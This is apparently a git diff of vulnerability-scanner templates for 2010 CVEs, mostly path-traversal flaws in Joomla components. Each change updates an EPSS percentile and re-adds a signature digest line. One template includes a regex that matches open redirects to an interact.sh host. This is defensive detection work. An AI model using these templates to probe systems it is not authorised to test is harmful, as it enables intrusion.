of file + +# digest: 490a00463044022062d350dec181362553d6ca2a3d237ac08079730d0b654d53e1e5a950a6cbea0c02204ba12524db1ada691a27a79b975b4bbc138be83d7d914d3437f87b036c6a2097:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1478.yaml b/http/cves/2010/CVE-2010-1478.yaml index 4c3fc3e573..2745d22f81 100644 --- a/http/cves/2010/CVE-2010-1478.yaml +++ b/http/cves/2010/CVE-2010-1478.yaml @@ -15,7 +15,7 @@ info: cve-id: CVE-2010-1478 cwe-id: CWE-22 epss-score: 0.00826 - epss-percentile: 0.80069 + epss-percentile: 0.80076 cpe: cpe:2.3:a:ternaria:com_jfeedback:1.2:*:*:*:*:*:*:* metadata: max-request: 1 @@ -37,4 +37,5 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221008983e356a6b0d98202ebdd420a2098f71c5ccd44cdbe665b336be187547b855d02205aa423954ddd7f1a957f043aa646c12184fe37b199a1b4d4eaa6f81e11f95e3d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450221008983e356a6b0d98202ebdd420a2098f71c5ccd44cdbe665b336be187547b855d02205aa423954ddd7f1a957f043aa646c12184fe37b199a1b4d4eaa6f81e11f95e3d:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1491.yaml b/http/cves/2010/CVE-2010-1491.yaml index 8984be853e..e7df6ae22e 100644 --- a/http/cves/2010/CVE-2010-1491.yaml +++ b/http/cves/2010/CVE-2010-1491.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-1491 cwe-id: CWE-22 epss-score: 0.00477 - epss-percentile: 0.73105 + epss-percentile: 0.7312 cpe: cpe:2.3:a:mms.pipp:com_mmsblog:2.3.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ec72549ed1f8c36dcea4d19a7676935587140c02b21f52ea40c58dab218ad077022100fdfa469c75a0ab76bff81676520d5e1399dd549de97bc97e223a9183b34e1675:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100ec72549ed1f8c36dcea4d19a7676935587140c02b21f52ea40c58dab218ad077022100fdfa469c75a0ab76bff81676520d5e1399dd549de97bc97e223a9183b34e1675:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1494.yaml b/http/cves/2010/CVE-2010-1494.yaml index 9237cdc03b..61941544b0 100644 --- a/http/cves/2010/CVE-2010-1494.yaml +++ b/http/cves/2010/CVE-2010-1494.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-1494 cwe-id: CWE-22 epss-score: 0.01827 - epss-percentile: 0.86897 + epss-percentile: 0.86904 cpe: cpe:2.3:a:awdsolution:com_awdwall:1.5.4:*:*:*:*:*:*:* metadata: max-request: 1 @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100cfa3085f405d91be4bacf720273a0e5f5c3f011c8f06f12d4092a9620623abb80221009c63ca52c15aad5ae7ccdb642249bcb7aa676fd8b8a207a140ef4b92ab4f6ed8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100cfa3085f405d91be4bacf720273a0e5f5c3f011c8f06f12d4092a9620623abb80221009c63ca52c15aad5ae7ccdb642249bcb7aa676fd8b8a207a140ef4b92ab4f6ed8:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1495.yaml b/http/cves/2010/CVE-2010-1495.yaml index cc172baa4b..279b889331 100644 --- a/http/cves/2010/CVE-2010-1495.yaml +++ b/http/cves/2010/CVE-2010-1495.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-1495 cwe-id: CWE-22 epss-score: 0.04503 - epss-percentile: 0.91539 + epss-percentile: 0.91545 cpe: cpe:2.3:a:matamko:com_matamko:1.01:*:*:*:*:*:*:* metadata: max-request: 1 @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c89f3ceab0380f4b368dfa8e8a19d0389d3ee8e2a3d830aa6d83253a1ed5248d022100e35ead7e89135255dc84d517fbaaaa73b589275f12084ca12e6df6e1a23cf254:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100c89f3ceab0380f4b368dfa8e8a19d0389d3ee8e2a3d830aa6d83253a1ed5248d022100e35ead7e89135255dc84d517fbaaaa73b589275f12084ca12e6df6e1a23cf254:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1531.yaml b/http/cves/2010/CVE-2010-1531.yaml index f655d56a72..64aecea505 100644 --- a/http/cves/2010/CVE-2010-1531.yaml +++ b/http/cves/2010/CVE-2010-1531.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-1531 cwe-id: CWE-22 epss-score: 0.01815 - epss-percentile: 0.86842 + epss-percentile: 0.86848 cpe: cpe:2.3:a:redcomponent:com_redshop:1.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 490a00463044022079339cb8c55c4ebf6d174e472d6dc2923c40839d560f9a8c348e87141f214ad3022041548891ca6ff77c5d45cf5037adb9b25778f5bb4b09dbc876baddf6e945fd9f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022079339cb8c55c4ebf6d174e472d6dc2923c40839d560f9a8c348e87141f214ad3022041548891ca6ff77c5d45cf5037adb9b25778f5bb4b09dbc876baddf6e945fd9f:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1532.yaml b/http/cves/2010/CVE-2010-1532.yaml index 2e87159969..00223d38cc 100644 --- a/http/cves/2010/CVE-2010-1532.yaml +++ b/http/cves/2010/CVE-2010-1532.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2010-1532 cwe-id: CWE-22 epss-score: 0.00477 - epss-percentile: 0.73105 + epss-percentile: 0.7312 cpe: cpe:2.3:a:givesight:com_powermail:1.53:*:*:*:*:*:*:* metadata: max-request: 1 @@ -38,4 +38,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100dfca1ff9baa3e9d76f297ca105bf57d0f6b9d035cff40caaa7d88a98e560211e022070905973434abc41142a7318096fd775591aa0ecb0ecfbea0180b68549a50fe0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100dfca1ff9baa3e9d76f297ca105bf57d0f6b9d035cff40caaa7d88a98e560211e022070905973434abc41142a7318096fd775591aa0ecb0ecfbea0180b68549a50fe0:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1533.yaml b/http/cves/2010/CVE-2010-1533.yaml index ec5c68e99a..3346de153f 100644 --- a/http/cves/2010/CVE-2010-1533.yaml +++ b/http/cves/2010/CVE-2010-1533.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2010-1533 cwe-id: CWE-22 epss-score: 0.00706 - epss-percentile: 0.78226 + epss-percentile: 0.78239 cpe: cpe:2.3:a:peter_hocherl:com_tweetla:1.0.1:*:*:*:*:*:*:* metadata: max-request: 1 @@ -38,4 +38,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d9bc4eedcef377b40fafcb6a98a7553415c09b013b5392e815b46ba712e8e658022100d8bec7523576199fe964513dbf4462851095b27375108651cb2553d7428dc5e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100d9bc4eedcef377b40fafcb6a98a7553415c09b013b5392e815b46ba712e8e658022100d8bec7523576199fe964513dbf4462851095b27375108651cb2553d7428dc5e8:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1534.yaml b/http/cves/2010/CVE-2010-1534.yaml index 686bbe795b..9f63873712 100644 --- a/http/cves/2010/CVE-2010-1534.yaml +++ b/http/cves/2010/CVE-2010-1534.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-1534 cwe-id: CWE-22 epss-score: 0.01733 - epss-percentile: 0.86484 + epss-percentile: 0.8649 cpe: cpe:2.3:a:joomla.batjo:com_shoutbox:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100886e1aff81d87c6f1940b79d74df5d04ba516740e5529c0fd9e83479bdff7486022100f72c85d05e0745088d270c1a62f1b1f036ec2561547ebe2bf6d72ead03cad0aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100886e1aff81d87c6f1940b79d74df5d04ba516740e5529c0fd9e83479bdff7486022100f72c85d05e0745088d270c1a62f1b1f036ec2561547ebe2bf6d72ead03cad0aa:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1535.yaml b/http/cves/2010/CVE-2010-1535.yaml index 6869a92c81..9c57114b86 100644 --- a/http/cves/2010/CVE-2010-1535.yaml +++ b/http/cves/2010/CVE-2010-1535.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-1535 cwe-id: CWE-22 epss-score: 0.00706 - epss-percentile: 0.78226 + epss-percentile: 0.78239 cpe: cpe:2.3:a:peter_hocherl:com_travelbook:1.0.1:*:*:*:*:*:*:* metadata: max-request: 1 @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502205d3bd774c433d907e104bc398b0c70a717fba6f6fd31affd0ffc9a7e35382909022100877ac2c024b680c63f31963f7145f6cbea7ba9f89a8020dfd01edbf16c1464de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502205d3bd774c433d907e104bc398b0c70a717fba6f6fd31affd0ffc9a7e35382909022100877ac2c024b680c63f31963f7145f6cbea7ba9f89a8020dfd01edbf16c1464de:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1540.yaml b/http/cves/2010/CVE-2010-1540.yaml index 02e2854019..2c65164125 100644 --- a/http/cves/2010/CVE-2010-1540.yaml +++ b/http/cves/2010/CVE-2010-1540.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2010-1540 cwe-id: CWE-22 epss-score: 0.0045 - epss-percentile: 0.72322 + epss-percentile: 0.72337 cpe: cpe:2.3:a:myblog:com_myblog:3.0.329:*:*:*:*:*:*:* metadata: max-request: 1 @@ -38,4 +38,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402203935060b93e143cd05d0a8f54dd65c5be427d50887a9d41882bd9c90a9f52b6002203f53e87d3461d3b90144b90c236709c516b065080b48050233be22b7a501fc84:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402203935060b93e143cd05d0a8f54dd65c5be427d50887a9d41882bd9c90a9f52b6002203f53e87d3461d3b90144b90c236709c516b065080b48050233be22b7a501fc84:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1586.yaml b/http/cves/2010/CVE-2010-1586.yaml index 4a1c20e0df..bf0dd504b4 100644 --- a/http/cves/2010/CVE-2010-1586.yaml +++ b/http/cves/2010/CVE-2010-1586.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-1586 cwe-id: CWE-20 epss-score: 0.00917 - epss-percentile: 0.81145 + epss-percentile: 0.81157 cpe: cpe:2.3:a:hp:system_management_homepage:2.0.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -36,4 +36,5 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:http?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# digest: 4a0a00473045022100e09ac03a327a9a1cc032f36d4e4e5a4af9a042db69de570497dc054d29b23bd602207b4bbfa9ffc3dd09b6190d92949e3923e1584b0acec05a63c2c3711a31e1ee51:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100e09ac03a327a9a1cc032f36d4e4e5a4af9a042db69de570497dc054d29b23bd602207b4bbfa9ffc3dd09b6190d92949e3923e1584b0acec05a63c2c3711a31e1ee51:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1601.yaml b/http/cves/2010/CVE-2010-1601.yaml index 6925b24ab4..59a404ad77 100644 --- a/http/cves/2010/CVE-2010-1601.yaml +++ b/http/cves/2010/CVE-2010-1601.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-1601 cwe-id: CWE-22 epss-score: 0.01299 - epss-percentile: 0.84398 + epss-percentile: 0.84406 cpe: cpe:2.3:a:joomlamart:com_jacomment:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f17b50967ee700dc4a0b7e82d5619e7b5bbc757a2a8e047aad3156f43817167b022100b04168a6169d2bad208981928db603eb8259aa08a4edba781198165052061f7e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100f17b50967ee700dc4a0b7e82d5619e7b5bbc757a2a8e047aad3156f43817167b022100b04168a6169d2bad208981928db603eb8259aa08a4edba781198165052061f7e:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1602.yaml b/http/cves/2010/CVE-2010-1602.yaml index 008f6c6757..9246087420 100644 --- a/http/cves/2010/CVE-2010-1602.yaml +++ b/http/cves/2010/CVE-2010-1602.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-1602 cwe-id: CWE-22 epss-score: 0.03451 - epss-percentile: 0.90423 + epss-percentile: 0.90428 cpe: cpe:2.3:a:zimbllc:com_zimbcomment:0.8.1:*:*:*:*:*:*:* metadata: max-request: 1 @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b9ce2cc6f48dd57cb6141f2272d8d70bfa37ae677cc51b34041f220c2c8b49c40220192b2401b07cc34b6088566f03b6dbaf9024d38dff86d84f668b255fb1fd03cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100b9ce2cc6f48dd57cb6141f2272d8d70bfa37ae677cc51b34041f220c2c8b49c40220192b2401b07cc34b6088566f03b6dbaf9024d38dff86d84f668b255fb1fd03cc:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1603.yaml b/http/cves/2010/CVE-2010-1603.yaml index 9513e0020e..66dd2c86bd 100644 --- a/http/cves/2010/CVE-2010-1603.yaml +++ b/http/cves/2010/CVE-2010-1603.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2010-1603 cwe-id: CWE-22 epss-score: 0.03451 - epss-percentile: 0.90423 + epss-percentile: 0.90428 cpe: cpe:2.3:a:zimbllc:com_zimbcore:0.1:*:*:*:*:*:*:* metadata: max-request: 1 @@ -38,4 +38,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100be8b2549555b193525fbd94bf6756e70ffeb31b6842ac5a8402623bb0bd3ec99022100ae0ee5759953b2c330c6429ce94c7a13b625439bb5be0c264bd7e214f7900c22:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100be8b2549555b193525fbd94bf6756e70ffeb31b6842ac5a8402623bb0bd3ec99022100ae0ee5759953b2c330c6429ce94c7a13b625439bb5be0c264bd7e214f7900c22:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1607.yaml b/http/cves/2010/CVE-2010-1607.yaml index 4abae4e2e8..b09ff0dbf4 100644 --- a/http/cves/2010/CVE-2010-1607.yaml +++ b/http/cves/2010/CVE-2010-1607.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-1607 cwe-id: CWE-22 epss-score: 0.01726 - epss-percentile: 0.86462 + epss-percentile: 0.86468 cpe: cpe:2.3:a:paysyspro:com_wmi:1.5.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210080f4ded964fcab5fc10f204ea1acdbea298f8163060470fd3c8b56437a03e25202200425e4b2b2c820f27e4dcdcc76c3711932c54e0403dd35007c19d7b25e9bdf38:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502210080f4ded964fcab5fc10f204ea1acdbea298f8163060470fd3c8b56437a03e25202200425e4b2b2c820f27e4dcdcc76c3711932c54e0403dd35007c19d7b25e9bdf38:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1653.yaml b/http/cves/2010/CVE-2010-1653.yaml index 3c32b342f9..dca6beb7d1 100644 --- a/http/cves/2010/CVE-2010-1653.yaml +++ b/http/cves/2010/CVE-2010-1653.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-1653 cwe-id: CWE-22 epss-score: 0.03527 - epss-percentile: 0.90512 + epss-percentile: 0.90518 cpe: cpe:2.3:a:htmlcoderhelper:com_graphics:1.0.6:*:*:*:*:*:*:* metadata: max-request: 1 @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502207d896bbbba4c3e917c08a5e5584112f3f3ce26a7ebd959272ebe9194cf2879a8022100e209184d4def5d6e1137285852b0098866b7b9b8487915bdc161550302c42bae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502207d896bbbba4c3e917c08a5e5584112f3f3ce26a7ebd959272ebe9194cf2879a8022100e209184d4def5d6e1137285852b0098866b7b9b8487915bdc161550302c42bae:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1657.yaml b/http/cves/2010/CVE-2010-1657.yaml index 254c871994..96cd17b121 100644 --- a/http/cves/2010/CVE-2010-1657.yaml +++ b/http/cves/2010/CVE-2010-1657.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-1657 cwe-id: CWE-22 epss-score: 0.01751 - epss-percentile: 0.86574 + epss-percentile: 0.8658 cpe: cpe:2.3:a:recly:com_smartsite:1.0.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202271cfe0a642d2cb398d96385608046d91513ee80830d258cfbe12c56e88e07002210088ea95e1dfc6f075289a397b2b23fbdbaec9ebc8e3ff0539a65e8ceebc587696:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502202271cfe0a642d2cb398d96385608046d91513ee80830d258cfbe12c56e88e07002210088ea95e1dfc6f075289a397b2b23fbdbaec9ebc8e3ff0539a65e8ceebc587696:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1658.yaml b/http/cves/2010/CVE-2010-1658.yaml index 1dbcba4078..4edc7e6f2e 100644 --- a/http/cves/2010/CVE-2010-1658.yaml +++ b/http/cves/2010/CVE-2010-1658.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-1658 cwe-id: CWE-22 epss-score: 0.01751 - epss-percentile: 0.86574 + epss-percentile: 0.8658 cpe: cpe:2.3:a:code-garage:com_noticeboard:1.3:*:*:*:*:*:*:* metadata: max-request: 1 @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502200c037ab3035207c4b3bf29b0922636065f8717cbbd9d87b8b801a7dc08b9eb2c022100b419338ce0d79d0b988fbc2ad1f2b0cd56224e06a8f0f819ebde59a8904a74a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502200c037ab3035207c4b3bf29b0922636065f8717cbbd9d87b8b801a7dc08b9eb2c022100b419338ce0d79d0b988fbc2ad1f2b0cd56224e06a8f0f819ebde59a8904a74a0:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1659.yaml b/http/cves/2010/CVE-2010-1659.yaml index 8e53d5e65e..b3ebdd8d7a 100644 --- a/http/cves/2010/CVE-2010-1659.yaml +++ b/http/cves/2010/CVE-2010-1659.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2010-1659 cwe-id: CWE-22 epss-score: 0.01806 - epss-percentile: 0.86814 + epss-percentile: 0.8682 cpe: cpe:2.3:a:webkul:com_ultimateportfolio:1.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -41,4 +41,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210081e468735d3dec1567672c08f0895e004c8abd6d08021b2aab6c1569510633f8022055004662a2ad48781d4f849792c12f4cb38e6ae581443e2e69e1a00ae3250146:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502210081e468735d3dec1567672c08f0895e004c8abd6d08021b2aab6c1569510633f8022055004662a2ad48781d4f849792c12f4cb38e6ae581443e2e69e1a00ae3250146:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1714.yaml b/http/cves/2010/CVE-2010-1714.yaml index 94c93eff22..5538e27fb5 100644 --- a/http/cves/2010/CVE-2010-1714.yaml +++ b/http/cves/2010/CVE-2010-1714.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2010-1714 cwe-id: CWE-22 epss-score: 0.01751 - epss-percentile: 0.86574 + epss-percentile: 0.8658 cpe: cpe:2.3:a:dev.pucit.edu.pk:com_arcadegames:1.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -41,4 +41,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e99afd8ef413ec5478b59cd76ccbb0711ac9cb76627bdcb5b71beaf18498b091022100e27b79ce21bd279075c3e769c5b7282049c4735bfe992d8d347300da994d4528:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100e99afd8ef413ec5478b59cd76ccbb0711ac9cb76627bdcb5b71beaf18498b091022100e27b79ce21bd279075c3e769c5b7282049c4735bfe992d8d347300da994d4528:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1715.yaml b/http/cves/2010/CVE-2010-1715.yaml index f2f330a8e4..43b7d7cb17 100644 --- a/http/cves/2010/CVE-2010-1715.yaml +++ b/http/cves/2010/CVE-2010-1715.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-1715 cwe-id: CWE-22 epss-score: 0.01242 - epss-percentile: 0.83986 + epss-percentile: 0.83996 cpe: cpe:2.3:a:pucit.edu:com_onlineexam:1.5.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221009ced416148d275a883b082cdb960d5fac29c07c25880245a9876c1230bda78a9022047f4f36f46494d7b8a1e7bb74dfa828eee7a84119f5bfd3e4d02c3f89eea51e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450221009ced416148d275a883b082cdb960d5fac29c07c25880245a9876c1230bda78a9022047f4f36f46494d7b8a1e7bb74dfa828eee7a84119f5bfd3e4d02c3f89eea51e2:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1717.yaml b/http/cves/2010/CVE-2010-1717.yaml index ac573b2f60..78c00355bf 100644 --- a/http/cves/2010/CVE-2010-1717.yaml +++ b/http/cves/2010/CVE-2010-1717.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-1717 cwe-id: CWE-22 epss-score: 0.01733 - epss-percentile: 0.86485 + epss-percentile: 0.8649 cpe: cpe:2.3:a:if_surfalert_project:if_surfalert:1.2:*:*:*:*:joomla\!:*:* metadata: max-request: 1 @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402202dc93d69595a1d78fb23074b828d6b1cb9cfa976b3fee74bc96b40d98d6625a3022011b9db7af0a40554fee363e6a6ec797ff2e3d0c71c63868574de9b537c13b594:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402202dc93d69595a1d78fb23074b828d6b1cb9cfa976b3fee74bc96b40d98d6625a3022011b9db7af0a40554fee363e6a6ec797ff2e3d0c71c63868574de9b537c13b594:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1718.yaml b/http/cves/2010/CVE-2010-1718.yaml index fd7bb6b220..12ef919b61 100644 --- a/http/cves/2010/CVE-2010-1718.yaml +++ b/http/cves/2010/CVE-2010-1718.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2010-1718 cwe-id: CWE-22 epss-score: 0.00826 - epss-percentile: 0.80069 + epss-percentile: 0.80076 cpe: cpe:2.3:a:lispeltuut:com_archeryscores:1.0.6:*:*:*:*:*:*:* metadata: max-request: 1 @@ -38,4 +38,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c9509461148bd3a114a77b51ae1bba0c9f8cd9648f24021c6a87d7a565d8ad62022100a896daf24be38621478281e877bd91b7b9800c52de360728d4aa351dc7e7b9e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100c9509461148bd3a114a77b51ae1bba0c9f8cd9648f24021c6a87d7a565d8ad62022100a896daf24be38621478281e877bd91b7b9800c52de360728d4aa351dc7e7b9e0:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1719.yaml b/http/cves/2010/CVE-2010-1719.yaml index b784d4210f..e58148d2be 100644 --- a/http/cves/2010/CVE-2010-1719.yaml +++ b/http/cves/2010/CVE-2010-1719.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-1719 cwe-id: CWE-22 epss-score: 0.01671 - epss-percentile: 0.86255 + epss-percentile: 0.86263 cpe: cpe:2.3:a:moto-treks:com_mtfireeagle:1.2:*:*:*:*:*:*:* metadata: max-request: 1 @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100962045769969c4997d263a943a9531d26975a2ce52111e493bf85062ab314cec022100e41dd688462134924b8a435cb86572c9e6479aeb27d92dac34904eed8f2eed83:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100962045769969c4997d263a943a9531d26975a2ce52111e493bf85062ab314cec022100e41dd688462134924b8a435cb86572c9e6479aeb27d92dac34904eed8f2eed83:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1722.yaml b/http/cves/2010/CVE-2010-1722.yaml index e6d5bf8047..3fb39e21d6 100644 --- a/http/cves/2010/CVE-2010-1722.yaml +++ b/http/cves/2010/CVE-2010-1722.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-1722 cwe-id: CWE-22 epss-score: 0.01242 - epss-percentile: 0.83986 + epss-percentile: 0.83996 cpe: cpe:2.3:a:dev.pucit.edu.pk:com_market:2.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210087fa04fbb89bc25ed4fb5e33415e10d09e726e58a1f2c41c568ab6bcf5972eaf0220511a8f339004fd6fc91d998d02d85692e52fa07a7f722a4e023557314f5aecad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502210087fa04fbb89bc25ed4fb5e33415e10d09e726e58a1f2c41c568ab6bcf5972eaf0220511a8f339004fd6fc91d998d02d85692e52fa07a7f722a4e023557314f5aecad:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1723.yaml b/http/cves/2010/CVE-2010-1723.yaml index e2ca4dec49..bf3bf24143 100644 --- a/http/cves/2010/CVE-2010-1723.yaml +++ b/http/cves/2010/CVE-2010-1723.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-1723 cwe-id: CWE-22 epss-score: 0.01956 - epss-percentile: 0.87415 + epss-percentile: 0.87431 cpe: cpe:2.3:a:joomlacomponent.inetlanka:com_drawroot:1.1:*:*:*:*:*:*:* metadata: max-request: 1 @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ae03dcb62fd0c6ecdc1546b57590d5feb9ee6b15c05e39df8a46f35e8da13ec40221009c27b3830d47f71f0f5ad1eaed02fe2227076fc94f37dd0ebaa694a5900d7d9a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100ae03dcb62fd0c6ecdc1546b57590d5feb9ee6b15c05e39df8a46f35e8da13ec40221009c27b3830d47f71f0f5ad1eaed02fe2227076fc94f37dd0ebaa694a5900d7d9a:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1858.yaml b/http/cves/2010/CVE-2010-1858.yaml index 29cb90acb3..e190ac236b 100644 --- a/http/cves/2010/CVE-2010-1858.yaml +++ b/http/cves/2010/CVE-2010-1858.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-1858 cwe-id: CWE-22 epss-score: 0.01155 - epss-percentile: 0.83297 + epss-percentile: 0.83314 cpe: cpe:2.3:a:gelembjuk:com_smestorage:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c4f925c24767f3631065315c1bf00f83af6b2f3bb71396de1a680b3f394faaeb022100c5762907233be0360517e2d35d030d854ce2e67176bd690fe5f777d822007fb3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100c4f925c24767f3631065315c1bf00f83af6b2f3bb71396de1a680b3f394faaeb022100c5762907233be0360517e2d35d030d854ce2e67176bd690fe5f777d822007fb3:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1870.yaml b/http/cves/2010/CVE-2010-1870.yaml index 0ccf7ab4e4..da38163ffd 100644 --- a/http/cves/2010/CVE-2010-1870.yaml +++ b/http/cves/2010/CVE-2010-1870.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2010-1870 cwe-id: CWE-917 epss-score: 0.05379 - epss-percentile: 0.92283 + epss-percentile: 0.92285 cpe: cpe:2.3:a:apache:struts:2.0.0:*:*:*:*:*:*:* metadata: 